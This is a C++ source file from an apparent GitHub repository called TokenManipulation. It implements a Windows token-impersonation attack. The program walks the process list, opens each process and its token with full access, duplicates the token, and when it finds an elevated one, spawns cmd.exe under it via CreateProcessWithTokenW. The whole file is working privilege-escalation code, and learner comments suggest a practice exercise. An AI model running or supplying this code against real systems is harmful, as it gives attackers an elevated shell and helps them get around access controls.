TokenManipulation/main.cpp at master · geek-kid/TokenManipulation · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#include <windows.h>
#include <tlhelp32.h>

using namespace std;


int main() {
    HANDLE processListTool;
    HANDLE process;
    PROCESSENTRY32 pe32;
    wchar_t cmdline[] = L"C:\\Windows\\system32\\cmd.exe";
    HANDLE newToken = NULL;
    HANDLE duplicateNewToken = NULL;
    TOKEN_ELEVATION elevation;
    BOOL privilege, ok = FALSE;
    // IDK what is this
    DWORD dwSize;

    processListTool = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (processListTool == INVALID_HANDLE_VALUE) {
        // TODO: call GetLastError for details
//        printf("You got an error while getting list of process");
        return (FALSE);
    };

    // IDK What is this. ask about this
    pe32.dwSize = sizeof(PROCESSENTRY32);

    try {
        if (!Process32First(processListTool, &pe32)) {
            throw 0;
        }
        do {
            process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
            if (process == NULL) {
                continue;
            }
            ok = OpenProcessToken(process, TOKEN_ALL_ACCESS, &newToken);
            if (newToken == NULL) {
//                printf("there is a problem with duplicating the token");
                continue;
            }
            DuplicateTokenEx(newToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &duplicateNewToken);

            if (!GetTokenInformation(duplicateNewToken, TokenElevation, &elevation, sizeof(elevation), &dwSize)) {
//                printf("\nFailed to get Token Information");
                throw 2;
            }

            privilege = elevation.TokenIsElevated;
            if (privilege) {
//                printf("found the token XD");

                CreateProcessWithTokenW(duplicateNewToken, LOGON_WITH_PROFILE, NULL, cmdline, 0, NULL, NULL,
                                        NULL, NULL);
                break;
            }
            privilege, ok = FALSE;


        } while (Process32Next(processListTool, &pe32));


    }
    catch (int exceptionNum) {
        CloseHandle(processListTool);
        if (exceptionNum == 0) {
//            printf("Process32First");
        }
        return (FALSE);
    }
    catch (...) {
        CloseHandle(processListTool);
//        printf("on handled exception :)");
        return (FALSE);
    }
}